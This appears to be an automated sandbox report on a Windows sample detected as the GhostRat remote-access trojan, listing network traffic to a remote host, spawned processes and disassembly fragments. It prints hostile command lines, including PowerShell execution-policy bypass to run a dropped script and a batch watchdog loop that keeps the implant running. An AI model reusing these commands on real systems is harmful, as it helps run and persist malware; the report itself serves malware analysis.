                                                                                          Jan 6, 2025 17:48:58.323925972 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.323935986 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.323964119 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.323966980 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:58.323976040 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.323991060 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324002981 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324007988 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:58.324039936 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:58.324137926 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324147940 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324157953 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324167967 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324189901 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:58.324203014 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:58.324229002 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324239016 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324249029 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324259043 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324260950 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:58.324273109 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324287891 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:58.324314117 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324315071 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:58.324325085 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324361086 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:58.324486017 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324517965 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324528933 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324542046 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:58.324572086 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:58.324596882 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:59.511885881 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:59.516647100 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:59.517781019 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:49:01.339317083 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:49:04.834398985 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:49:04.839195967 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:49:04.839226961 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:49:04.839272022 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:49:04.839365005 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:49:05.155966997 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:49:05.156306028 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:49:05.161259890 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:49:16.823725939 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:49:16.828840017 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:49:17.140727997 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:49:17.182946920 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:49:17.203547955 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:49:17.209254026 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:49:32.698858023 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:49:32.703802109 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:49:33.015674114 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:49:33.057971001 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:49:33.140908957 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:49:33.145826101 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:49:48.620944023 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:49:48.625897884 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:49:48.937979937 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:49:48.980026960 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:49:49.025913954 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:49:49.031265974 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:50:05.766654968 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:50:05.771660089 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:50:06.083528042 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:50:06.137453079 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:50:06.148926020 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:50:06.153764009 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:50:21.526869059 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:50:21.531795979 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:50:21.843673944 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:50:21.886225939 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:50:21.910900116 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:50:21.915715933 CET1509149940134.122.155.39192.168.2.4

                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:11:47:31
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Users\user\Desktop\ErbgterT2R.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\ErbgterT2R.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:73'541'183 bytes
                                                                                          MD5 hash:14DFEC5B51C4D87EACAB495AD216EB7C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:1
                                                                                          Start time:11:47:41
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          Imagebase:0x240000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:11:47:41
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:11:47:41
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          Imagebase:0x20000
                                                                                          File size:395'368 bytes
                                                                                          MD5 hash:FB325C945A08D06FE91681179BDCCC66
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2585756688.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2921881516.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3251872110.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3564033728.0000000003000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3080679847.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2762477025.000000000466D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3080736947.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3564873344.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3409527868.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3564258911.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3409583001.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2921820628.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2585718270.0000000004721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3251923275.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2762513988.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 0%, ReversingLabs
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:9
                                                                                          Start time:11:48:51
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
                                                                                          Imagebase:0x240000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:10
                                                                                          Start time:11:48:51
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:11
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                                                                          Imagebase:0x2d0000
                                                                                          File size:79'360 bytes
                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:12
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:findstr /I "Update.exe"
                                                                                          Imagebase:0x200000
                                                                                          File size:29'696 bytes
                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:13
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:timeout /t 30 /nobreak
                                                                                          Imagebase:0x300000
                                                                                          File size:25'088 bytes
                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:14
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                          Imagebase:0x240000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:15
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                          Imagebase:0x240000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:16
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:17
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:18
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                          Imagebase:0x520000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:19
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                          Imagebase:0x520000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:20
                                                                                          Start time:11:49:22
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                                                                          Imagebase:0x2d0000
                                                                                          File size:79'360 bytes
                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:21
                                                                                          Start time:11:49:22
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:findstr /I "Update.exe"
                                                                                          Imagebase:0x200000
                                                                                          File size:29'696 bytes
                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:22
                                                                                          Start time:11:49:22
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:timeout /t 30 /nobreak
                                                                                          Imagebase:0x300000
                                                                                          File size:25'088 bytes
                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:23
                                                                                          Start time:11:49:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                                                                          Imagebase:0x2d0000
                                                                                          File size:79'360 bytes
                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:24
                                                                                          Start time:11:49:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:findstr /I "Update.exe"
                                                                                          Imagebase:0x200000
                                                                                          File size:29'696 bytes
                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:25
                                                                                          Start time:11:49:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:timeout /t 30 /nobreak
                                                                                          Imagebase:0x300000
                                                                                          File size:25'088 bytes
                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:26
                                                                                          Start time:11:50:22
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                                                                          Imagebase:0x2d0000
                                                                                          File size:79'360 bytes
                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:27
                                                                                          Start time:11:50:22
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:findstr /I "Update.exe"
                                                                                          Imagebase:0x200000
                                                                                          File size:29'696 bytes
                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:28
                                                                                          Start time:11:50:22
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:timeout /t 30 /nobreak
                                                                                          Imagebase:0x300000
                                                                                          File size:25'088 bytes
                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:18%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:26.8%
                                                                                            Total number of Nodes:1423
                                                                                            Total number of Limit Nodes:15
                                                                                            execution_graph 9093 410e7f 9094 410e9a 9093->9094 9095 410eb5 9094->9095 9097 40f42d 9094->9097 9098 40f445 free 9097->9098 9099 40f437 9097->9099 9100 4024e7 46 API calls 9098->9100 9099->9098 9101 40f456 9099->9101 9100->9101 9101->9095 9089 40e63c 9090 40e5d3 6 API calls 9089->9090 9091 40e644 9090->9091 8241 4024c4 8242 40245a 45 API calls 8241->8242 8243 4024cd 8242->8243 8244 4024d2 8243->8244 8245 4024d3 VirtualAlloc 8243->8245 8246 4096c7 _EH_prolog 8260 4096fa 8246->8260 8247 40971c 8248 409827 8281 40118a 8248->8281 8250 409851 8255 40985e ??2@YAPAXI 8250->8255 8251 40983c 8332 409425 8251->8332 8252 4094e0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8252->8260 8254 40969d 8 API calls 8254->8260 8256 409878 8255->8256 8261 409925 ??2@YAPAXI 8256->8261 8262 4098c2 8256->8262 8266 409530 3 API calls 8256->8266 8268 409425 ctype 3 API calls 8256->8268 8270 4099a2 8256->8270 8275 409a65 8256->8275 8291 409fb4 8256->8291 8295 408ea4 8256->8295 8338 409c13 ??2@YAPAXI 8256->8338 8340 409f49 8256->8340 8258 40e959 VirtualFree ??3@YAXPAX free free ctype 8258->8260 8260->8247 8260->8248 8260->8252 8260->8254 8260->8258 8325 4095b7 8260->8325 8329 409403 8260->8329 8261->8256 8335 409530 8262->8335 8266->8256 8268->8256 8271 409530 3 API calls 8270->8271 8272 4099c7 8271->8272 8273 409425 ctype 3 API calls 8272->8273 8273->8247 8277 409530 3 API calls 8275->8277 8278 409a84 8277->8278 8279 409425 ctype 3 API calls 8278->8279 8279->8247 8282 401198 GetDiskFreeSpaceExW 8281->8282 8283 4011ee SendMessageW 8281->8283 8282->8283 8284 4011b0 8282->8284 8289 4011d6 8283->8289 8284->8283 8285 401f9d 19 API calls 8284->8285 8286 4011c9 8285->8286 8287 407717 25 API calls 8286->8287 8288 4011cf 8287->8288 8288->8289 8290 4011e7 8288->8290 8289->8250 8289->8251 8290->8283 8292 409fdd 8291->8292 8344 409dff 8292->8344 8618 40aef3 8295->8618 8298 408ec1 8298->8256 8300 408fd5 8636 408b7c 8300->8636 8301 408f0d ??2@YAPAXI 8310 408ef5 8301->8310 8303 408f31 ??2@YAPAXI 8303->8310 8310->8300 8310->8301 8310->8303 8681 40cdb8 ??2@YAPAXI 8310->8681 8326 4095c6 8325->8326 8328 4095cc 8325->8328 8326->8260 8327 4095e2 _CxxThrowException 8327->8326 8328->8326 8328->8327 8330 40e8e2 4 API calls 8329->8330 8331 40940b 8330->8331 8331->8260 8333 40e8da ctype 3 API calls 8332->8333 8334 409433 8333->8334 8336 408963 ctype 3 API calls 8335->8336 8337 40953b 8336->8337 8339 409c45 8338->8339 8339->8256 8341 409f4e 8340->8341 8342 409f75 8341->8342 8343 409cde 110 API calls 8341->8343 8342->8256 8343->8341 8346 409e04 8344->8346 8345 409e3a 8345->8256 8346->8345 8348 409cde 8346->8348 8349 409cf8 8348->8349 8353 40db1f 8349->8353 8356 401626 8349->8356 8350 409d2c 8350->8346 8419 40da56 8353->8419 8357 401642 8356->8357 8363 401638 8356->8363 8427 40a62f _EH_prolog 8357->8427 8359 40166f 8495 40eca9 8359->8495 8360 401411 2 API calls 8362 401688 8360->8362 8364 401962 ??3@YAXPAX 8362->8364 8365 40169d 8362->8365 8363->8350 8369 40eca9 VariantClear 8364->8369 8453 401329 8365->8453 8368 4016a8 8457 401454 8368->8457 8369->8363 8372 401362 2 API calls 8373 4016c7 ??3@YAXPAX 8372->8373 8378 4016d9 8373->8378 8405 401928 ??3@YAXPAX 8373->8405 8375 40eca9 VariantClear 8375->8363 8376 4016fa 8377 40eca9 VariantClear 8376->8377 8379 401702 ??3@YAXPAX 8377->8379 8378->8376 8380 401764 8378->8380 8393 401725 8378->8393 8379->8359 8382 4017a2 8380->8382 8383 401789 8380->8383 8381 40eca9 VariantClear 8384 401737 ??3@YAXPAX 8381->8384 8386 4017c4 GetLocalTime SystemTimeToFileTime 8382->8386 8387 4017aa 8382->8387 8385 40eca9 VariantClear 8383->8385 8384->8359 8388 401791 ??3@YAXPAX 8385->8388 8386->8387 8389 4017e1 8387->8389 8390 4017f8 8387->8390 8387->8393 8388->8359 8462 403354 lstrlenW 8389->8462 8486 40301a GetFileAttributesW 8390->8486 8393->8381 8395 401934 GetLastError 8395->8405 8396 401818 ??2@YAPAXI 8398 401824 8396->8398 8397 40192a 8397->8395 8499 40db53 8398->8499 8401 40190f 8404 40eca9 VariantClear 8401->8404 8402 40185f GetLastError 8502 4012f7 8402->8502 8404->8405 8405->8375 8406 401871 8407 403354 86 API calls 8406->8407 8411 40187f ??3@YAXPAX 8406->8411 8409 4018cc 8407->8409 8409->8411 8412 40db53 2 API calls 8409->8412 8410 40189c 8413 40eca9 VariantClear 8410->8413 8411->8410 8414 4018f1 8412->8414 8415 4018aa ??3@YAXPAX 8413->8415 8416 4018f5 GetLastError 8414->8416 8417 401906 ??3@YAXPAX 8414->8417 8415->8359 8416->8411 8417->8401 8424 40d985 8419->8424 8422 40da65 CreateFileW 8423 40da8a 8422->8423 8423->8350 8425 40d98f CloseHandle 8424->8425 8426 40d99a 8424->8426 8425->8426 8426->8422 8426->8423 8428 40a738 8427->8428 